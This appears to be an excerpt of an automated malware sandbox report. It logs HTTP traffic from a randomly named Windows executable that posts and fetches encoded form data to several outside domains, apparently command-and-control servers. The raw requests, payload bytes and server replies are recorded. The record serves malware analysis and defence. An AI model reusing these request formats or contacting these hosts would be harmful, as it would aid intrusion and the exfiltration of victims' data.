                                        Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 65 32 6a 42 57 32 6a 64 51 43 62 2b 77 53 34 51 76 41 41 41 56 63 75 54 45 69 59 6f 67 45 31 45 52 30 58 64 6f 2f 47 55 48 74 4e 2b 46 77 34 36 6d 77 59 56 47 71 4f 73 41 65 6f 47 64 5a 61 4b 50 6c 4a 32 72 54 61 57 39 6a 66 52 71 48 45 66 4f 68 6a 4f 56 4d 51 51 34 66 43 74 30 76 57 76 75 50 6d 30 6b 64 76 53 2f 4d 6c 6d 45 34 37 39 41 43 37 34 6d 37 36 7a 39 53 53 37 69 79 37 69 31 6c 7a 65 78 35 39 77 36 79 53 6f 30 65 6b 46 69 36 63 75 61 36 48 38 65 50 6a 50 64 52 49 2b 57 68 51 41 5a 71 71 70 4e 61 43 67 42 45 50 50 6e 38 6c 75 69 42 31 50 6b 73 2f 38 62 36 6b 63 49 75 77 77 76 6a 7a 42 68 74 4e 48 48 44 73 48 77 78 79 73 6c 36 71 48 73 6c 57 46 68 47 4b 66 35 4c 77 66 6a 38 6c 49 2f 63 4b 4c 34 75 54 35 64 77 48 42 71 43 4c 33 46 75 4d 4d 55 6d 2f 59 71 46 4e 37 6b 4b 53 6e 75 6a 7a 6f 78 78 46 70 43 59 6c 71 38 77 59 64 68 4d 36 75 65 2f 44 79 6a 61 51 33 30 71 34 38 76 46 73 30 64 33 73 39 68 68 79 50 47 51 33 77 6e 64 76 42 48 74 45 2f [TRUNCATED]
                                        Data Ascii: 3h-p=AktOH2f76OxBGe2jBW2jdQCb+wS4QvAAAVcuTEiYogE1ER0Xdo/GUHtN+Fw46mwYVGqOsAeoGdZaKPlJ2rTaW9jfRqHEfOhjOVMQQ4fCt0vWvuPm0kdvS/MlmE479AC74m76z9SS7iy7i1lzex59w6ySo0ekFi6cua6H8ePjPdRI+WhQAZqqpNaCgBEPPn8luiB1Pks/8b6kcIuwwvjzBhtNHHDsHwxysl6qHslWFhGKf5Lwfj8lI/cKL4uT5dwHBqCL3FuMMUm/YqFN7kKSnujzoxxFpCYlq8wYdhM6ue/DyjaQ30q48vFs0d3s9hhyPGQ3wndvBHtE/5zquPkwQkqLSjf3lrxNa7HP7V6HSL84Wq8V1SDDLsJ6+5/ADUGTYtxNkaenn7hsN0pQstRD0TVBvERmLX6zE3cNqgbAeUeTX/hRwy0VBOPrmhjkNofp7IkMbZVc/c45tOqYB59wrplqOhAYbzF7AfZND0JS7AWVm8DRAZDuVLsQ24DbgTzk5jwXg/29A6cqcSGoDoO9enJn/ndtuUhjCgRganEcQubl72C2caVjMcboTVVnmA1KTsZ7j2lOX/qhYWPBep/EIPAIhJ6QassxqJj5zzCjSvRBZLexnyDKtprj8xAvgCqfG9Mxu2M++UtVlIJhJOt7CmHWL6BxzRqyf0TCNrAO0Yzpypbr+GjDgwrQF5/TMQ4YMkk4yVn6qWJn4ryHnL77J2l4+Kw3QeFrBndqS6HgXO7h/4A9LyipRQNjH47lo+JSc68i9rYo3cXNTwlvUVB9/Q7xm+tLxlLPoUUyTHeQnmy3CPArBKPLwnyhDqS33MkFc+NfR/rcsVq242TskCnXCFh1HjyhZrIyxw5ruVCoC3GTWj+Aa6EWKlIS+JUTWXry9v+X82bqrAvsPNouaCDSHI+E/ZLlgdPFyHAy1lSHQAnUk0HI4KVObksjL4fkuZBQ/B5T0LYrCrxHvQzWTz6bnhjd/WJq6kRq9rwFuA2KAxVfVmD [TRUNCATED]
                                        Sep 27, 2024 06:35:21.592946053 CEST462INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:21 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.75495638.180.87.102802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:23.533736944 CEST479OUTGET /jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:35:24.168652058 CEST486INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:24 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6b 79 73 74 61 72 67 61 7a 65 67 75 69 64 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.skystargazeguide.store Port 80</address></body></html>0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.75495743.154.104.247802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:29.838633060 CEST720OUTPOST /aqh8/ HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.nmh6.site
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.nmh6.site/aqh8/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 30 38 38 66 43 4a 4f 54 58 7a 2f 48 6f 54 46 32 67 34 50 6e 69 6c 4a 4f 77 65 66 57 5a 67 36 4a 46 42 52 5a 75 59 76 73 72 57 2b 43 64 43 34 37 67 31 67 52 44 71 4c 4f 55 41 42 58 64 44 6c 6c 49 69 48 64 57 6a 55 6f 36 58 75 45 74 4b 58 77 68 57 7a 39 38 39 6a 63 2b 68 51 59 45 51 4f 34 33 51 4d 6d 35 36 78 38 52 57 69 70 4d 57 59 6d 55 70 62 56 43 63 46 70 73 55 6e 77 51 66 31 6a 6b 59 70 4d 78 41 56 49 38 44 79 71 79 4b 4b 46 47 51 38 75 5a 41 4a 4f 65 4d 38 54 33 6c 44 6a 64 55 31 46 54 6a 70 73 66 7a 48 31 73 50 6e 6e 46 41 42 5a 52 6a 73 2f 4f 6a 53 2f 6c 55 56 6c 78 50 70 4e 6a 55 36 49 54 44 51 39 63 4b 77 69 76 67 3d 3d
                                        Data Ascii: 3h-p=088fCJOTXz/HoTF2g4PnilJOwefWZg6JFBRZuYvsrW+CdC47g1gRDqLOUABXdDllIiHdWjUo6XuEtKXwhWz989jc+hQYEQO43QMm56x8RWipMWYmUpbVCcFpsUnwQf1jkYpMxAVI8DyqyKKFGQ8uZAJOeM8T3lDjdU1FTjpsfzH1sPnnFABZRjs/OjS/lUVlxPpNjU6ITDQ9cKwivg==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.75495843.154.104.247802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:32.379057884 CEST740OUTPOST /aqh8/ HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.nmh6.site
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.nmh6.site/aqh8/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 30 38 38 66 43 4a 4f 54 58 7a 2f 48 6f 77 74 32 69 62 6e 6e 31 56 4a 4e 36 2b 66 57 4c 67 36 56 46 42 64 5a 75 63 66 38 6f 6b 61 43 64 69 6f 37 68 77 4d 52 43 71 4c 4f 4d 51 42 65 54 6a 6c 73 49 69 37 76 57 6a 6f 6f 36 58 36 45 74 50 37 77 68 6c 4c 2b 75 64 6a 53 79 42 51 61 5a 67 4f 34 33 51 4d 6d 35 36 4e 57 52 57 71 70 4d 6c 41 6d 55 49 62 57 4f 38 46 75 72 55 6e 77 47 76 31 76 6b 59 6f 76 78 45 63 76 38 47 2b 71 79 50 32 46 47 42 38 68 53 41 4a 49 44 38 39 67 33 51 6d 48 63 6d 78 65 56 56 6c 36 57 7a 6e 45 74 35 36 46 66 69 4e 31 50 79 55 45 4b 68 32 4a 79 79 49 51 7a 4f 74 56 75 32 4f 70 4d 30 31 58 52 59 52 6d 35 63 6e 50 35 4e 34 65 2f 50 67 57 2b 33 69 52 48 33 51 7a 46 73 55 3d
                                        Data Ascii: 3h-p=088fCJOTXz/Howt2ibnn1VJN6+fWLg6VFBdZucf8okaCdio7hwMRCqLOMQBeTjlsIi7vWjoo6X6EtP7whlL+udjSyBQaZgO43QMm56NWRWqpMlAmUIbWO8FurUnwGv1vkYovxEcv8G+qyP2FGB8hSAJID89g3QmHcmxeVVl6WznEt56FfiN1PyUEKh2JyyIQzOtVu2OpM01XRYRm5cnP5N4e/PgW+3iRH3QzFsU=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.75495943.154.104.247802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:34.934557915 CEST1753OUTPOST /aqh8/ HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.nmh6.site
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.nmh6.site/aqh8/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 30 38 38 66 43 4a 4f 54 58 7a 2f 48 6f 77 74 32 69 62 6e 6e 31 56 4a 4e 36 2b 66 57 4c 67 36 56 46 42 64 5a 75 63 66 38 6f 6b 53 43 64 78 51 37 68 54 30 52 51 36 4c 4f 46 77 42 54 54 6a 6b 38 49 6d 58 52 57 6a 6c 64 36 52 32 45 69 4e 7a 77 6f 30 4c 2b 33 74 6a 53 74 78 51 58 45 51 4f 68 33 51 63 71 35 36 39 57 52 57 71 70 4d 6a 45 6d 44 4a 62 57 49 38 46 70 73 55 6e 30 51 66 30 36 6b 63 38 52 78 45 59 56 38 31 32 71 7a 76 47 46 4b 54 6b 68 66 41 4a 4b 41 38 39 34 33 51 69 59 63 6d 74 38 56 56 35 55 57 77 33 45 76 39 50 4a 59 43 41 71 54 51 51 66 4e 6e 69 36 39 67 4a 6b 37 4e 74 78 6c 6b 79 54 52 47 78 57 56 59 64 50 34 5a 71 72 6d 76 55 75 7a 4f 63 37 35 51 43 42 63 58 78 31 61 70 38 7a 76 44 33 68 66 70 49 56 63 44 76 61 4b 66 6f 31 4a 32 43 6e 72 56 64 71 4e 38 48 71 2f 38 2f 72 6a 56 67 34 5a 50 4d 4a 78 43 53 34 5a 41 6c 62 6e 56 52 76 33 36 30 6e 59 62 36 6d 6d 33 39 78 47 72 71 6a 6d 43 2f 51 6f 57 74 58 67 79 62 62 67 41 51 5a 2b 4a 73 72 50 46 76 35 61 39 35 54 42 4a 6a 4f 76 [TRUNCATED]
                                        Data Ascii: 3h-p=088fCJOTXz/Howt2ibnn1VJN6+fWLg6VFBdZucf8okSCdxQ7hT0RQ6LOFwBTTjk8ImXRWjld6R2EiNzwo0L+3tjStxQXEQOh3Qcq569WRWqpMjEmDJbWI8FpsUn0Qf06kc8RxEYV812qzvGFKTkhfAJKA8943QiYcmt8VV5UWw3Ev9PJYCAqTQQfNni69gJk7NtxlkyTRGxWVYdP4ZqrmvUuzOc75QCBcXx1ap8zvD3hfpIVcDvaKfo1J2CnrVdqN8Hq/8/rjVg4ZPMJxCS4ZAlbnVRv360nYb6mm39xGrqjmC/QoWtXgybbgAQZ+JsrPFv5a95TBJjOvFHiQExk3syC3yl1NWwBY6UaixC+6rRLsonsmenq7I21FHdy4MqUdzrNhbSumsntBW713MltU56njPhuYMOPUvf8niDCecQteAtMFYPUYbne9YMhkQ9OSjU5xC0I7cwudMQM3fdfOakiv092Bs5I+ez53tP+dOcx1RZI8RcyKEThvqFUo3W2+0xppzwm87Kwpi+H8STdiGgZzxgOonvcRKaZA3d+IRe+TD8U98x6Zkpo+bieeO4VLnz4nxUnwuifEbkaVu9zU2zuzTaZbWSVJul1JtnQRvrh9k4qScAZm2Aj2wxHcTJHqXkZjaoAT88NTQUni4k5pEJTDRnu9G119KhhQqHBm3lEAmHEdUySz/dIZrrKNKfvqMgfHG692ZPv0SiRDQG8HiXjhjvgtPTiI7ICf1p+kWUX8olS4FGeKOes/5i06x5WlaqhacNkQU5Ss8cecaQaFC1HtkftzTpQX2rBKRyqQE8QoBUIcZ2ELzBu87X2TI6PSd8dJYkHrhTKeRgr8Tk7CixDbXOcCS55WIpxXc1lLCICrLIhcWvR7Pf2TV7hLUdfCvDATXW/pT52M7IX0fm0UEBpZx3Ty7cxHn08Z744L6KqG9UKyQa6KMDqM/ZkiY0aCoAFwOQo0JlNWg4hkMtw6/nY1LSG44Y9nTm8Mg2F7K6dDev [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.75496043.154.104.247802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:37.486563921 CEST466OUTGET /aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.nmh6.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.75496113.248.169.48802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:03.912205935 CEST744OUTPOST /3632/ HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.sapatarias.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.sapatarias.online/3632/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 55 42 44 53 63 55 4f 36 4f 67 6c 6c 62 64 51 6e 33 6f 74 4e 49 55 4f 5a 50 73 6f 64 53 44 59 44 57 4f 45 33 6a 6d 33 72 6e 37 58 78 59 68 68 6e 38 48 34 78 71 4c 36 71 7a 75 6b 6b 36 59 71 48 68 62 79 6c 46 6f 6c 57 4c 4b 48 49 6b 4c 54 31 58 6a 43 71 4e 58 38 43 53 32 30 73 79 65 7a 6c 6d 68 58 47 63 48 57 2f 58 2f 44 78 70 38 4b 64 6f 50 47 69 74 62 42 49 31 33 7a 2f 41 6b 61 42 6a 52 68 43 2f 4c 47 63 51 75 64 51 54 57 34 6d 38 6e 55 49 52 50 6a 6e 5a 38 73 7a 50 6f 32 6c 4a 36 39 62 31 39 74 51 62 62 73 6e 55 37 78 63 47 47 6a 49 32 75 33 6f 36 7a 45 71 57 2b 69 6e 62 30 6c 30 64 51 35 66 4f 39 6d 4a 62 32 48 2b 6a 67 3d 3d
                                        Data Ascii: 3h-p=UBDScUO6OgllbdQn3otNIUOZPsodSDYDWOE3jm3rn7XxYhhn8H4xqL6qzukk6YqHhbylFolWLKHIkLT1XjCqNX8CS20syezlmhXGcHW/X/Dxp8KdoPGitbBI13z/AkaBjRhC/LGcQudQTW4m8nUIRPjnZ8szPo2lJ69b19tQbbsnU7xcGGjI2u3o6zEqW+inb0l0dQ5fO9mJb2H+jg==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.75496213.248.169.48802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:06.460464954 CEST764OUTPOST /3632/ HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.sapatarias.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.sapatarias.online/3632/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 55 42 44 53 63 55 4f 36 4f 67 6c 6c 61 34 59 6e 79 4c 31 4e 50 30 4f 61 52 63 6f 64 46 54 59 48 57 4f 34 33 6a 6e 44 37 6e 4a 7a 78 59 46 6c 6e 7a 6a 73 78 74 4c 36 71 38 4f 6b 39 35 6f 71 4d 68 62 2b 62 46 73 6c 57 4c 4b 6a 49 6b 4a 37 31 57 52 71 70 43 6e 38 36 48 6d 30 75 71 2b 7a 6c 6d 68 58 47 63 48 53 47 58 38 7a 78 70 73 36 64 70 75 47 6c 7a 4c 42 4c 68 6e 7a 2f 45 6b 62 70 6a 52 67 79 2f 50 48 33 51 72 5a 51 54 57 49 6d 79 54 49 4c 49 2f 6a 62 64 38 74 34 42 37 44 54 58 59 38 6c 79 50 78 55 43 63 63 67 63 74 73 2b 63 6b 76 6b 6f 2f 50 54 2b 78 67 63 42 59 2f 53 5a 31 68 73 51 79 4e 2b 52 4b 44 6a 57 6b 6d 36 31 64 72 59 55 43 42 63 42 64 52 7a 55 5a 5a 48 77 68 32 4c 34 46 45 3d
                                        Data Ascii: 3h-p=UBDScUO6Oglla4YnyL1NP0OaRcodFTYHWO43jnD7nJzxYFlnzjsxtL6q8Ok95oqMhb+bFslWLKjIkJ71WRqpCn86Hm0uq+zlmhXGcHSGX8zxps6dpuGlzLBLhnz/EkbpjRgy/PH3QrZQTWImyTILI/jbd8t4B7DTXY8lyPxUCccgcts+ckvko/PT+xgcBY/SZ1hsQyN+RKDjWkm61drYUCBcBdRzUZZHwh2L4FE=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.75496313.248.169.48802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:09.004013062 CEST1777OUTPOST /3632/ HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.sapatarias.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.sapatarias.online/3632/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 55 42 44 53 63 55 4f 36 4f 67 6c 6c 61 34 59 6e 79 4c 31 4e 50 30 4f 61 52 63 6f 64 46 54 59 48 57 4f 34 33 6a 6e 44 37 6e 4a 37 78 59 77 78 6e 79 43 73 78 73 4c 36 71 78 75 6b 67 35 6f 71 52 68 62 6d 66 46 74 59 6a 4c 49 72 49 69 71 44 31 48 51 71 70 56 58 38 36 46 6d 30 7a 79 65 79 6e 6d 69 76 34 63 48 43 47 58 38 7a 78 70 76 69 64 75 2f 47 6c 78 4c 42 49 31 33 7a 37 41 6b 61 45 6a 52 35 4b 2f 50 4b 4d 54 59 52 51 54 79 73 6d 2b 47 55 4c 58 50 6a 64 61 38 74 72 42 37 66 41 58 59 78 55 79 4f 56 2b 43 62 6f 67 66 62 35 31 5a 48 6e 6c 36 4e 50 4a 2f 51 30 48 44 5a 54 6b 63 6b 31 4f 4e 77 52 50 56 4b 72 71 62 45 54 75 2b 5a 72 5a 46 43 6b 69 49 76 64 30 61 2b 59 64 6a 45 62 42 35 54 47 55 56 31 30 51 41 76 64 53 4c 47 4b 57 4b 43 39 4a 32 6b 2f 34 49 77 6a 4c 4b 79 76 74 2b 56 2f 34 55 6e 38 71 51 7a 4f 66 61 42 62 54 64 32 76 4e 47 49 67 6c 64 6b 76 45 78 49 2f 54 41 77 69 68 67 37 6c 65 5a 34 55 31 69 62 4c 6f 79 66 72 72 6c 5a 64 74 4d 68 34 39 79 73 45 6c 4a 78 37 64 4e 2b 76 4a 6e [TRUNCATED]
                                        Data Ascii: 3h-p=UBDScUO6Oglla4YnyL1NP0OaRcodFTYHWO43jnD7nJ7xYwxnyCsxsL6qxukg5oqRhbmfFtYjLIrIiqD1HQqpVX86Fm0zyeynmiv4cHCGX8zxpvidu/GlxLBI13z7AkaEjR5K/PKMTYRQTysm+GULXPjda8trB7fAXYxUyOV+Cbogfb51ZHnl6NPJ/Q0HDZTkck1ONwRPVKrqbETu+ZrZFCkiIvd0a+YdjEbB5TGUV10QAvdSLGKWKC9J2k/4IwjLKyvt+V/4Un8qQzOfaBbTd2vNGIgldkvExI/TAwihg7leZ4U1ibLoyfrrlZdtMh49ysElJx7dN+vJnTZLtNWtgG7Ra+wqQ/q8TB02N5ijzbW8XO3jsm9+v52/1Jg4ekSyzZepzApZ+xWf0zpspc0Iu0tA5OwhPThreAk4+NDxAbbhfVJ8WCD6TxWhYcWvKqZA6chnl0X3r8xuSyuNp0FRA6AGiA2rb/DekbfWv0wQojYm584WwJeWpdN+/DZcb6GfO6LI2JQlujnvqUNSu2MbeOsTl671/Ts8bIFJ3YsU6JbSFUqXzrimLhNhhWXkIIhwReK8WFQzkpiu6Ev6Y60xq1sesjhzO4gyo0Sq5dqs3veZeX0MIy1OrwPWi39Xd/vUTVZYm/KDmZEVakif4M+eVgKQ+wYLXoRWki9GnQImdfbSrrlMDhJppJ12i/zLIZTccIPd4DbKg/LF48J77CD8poIre9Zfb7JTvoP6e1scElHNnWfjI4KLLOHLM5QQyjfGs7U6bF7pPosUfj4BQXdm7uVyUtxykFtEavWG+UuI69yPZIHXvpDiCNAEemyX3TKegRk36NkY7ZuBc4Srj02ItL5asiL0QNSMQ9dkodwoMGb0iYkM8YFV+E7BRXq1gB4SDSyx9/MtFLopRFgM699nHrfMxwbppbfX7tEVRLEfAjhdNU/D4y0b0yLuyMxgdaOAu1/gyYypQsdV/0EM6SSd2W2o6j8ljQ/7vbllT9QZGY1v1GT [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.75496413.248.169.48802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:11.549455881 CEST474OUTGET /3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.sapatarias.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:36:12.006295919 CEST416INHTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:36:11 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
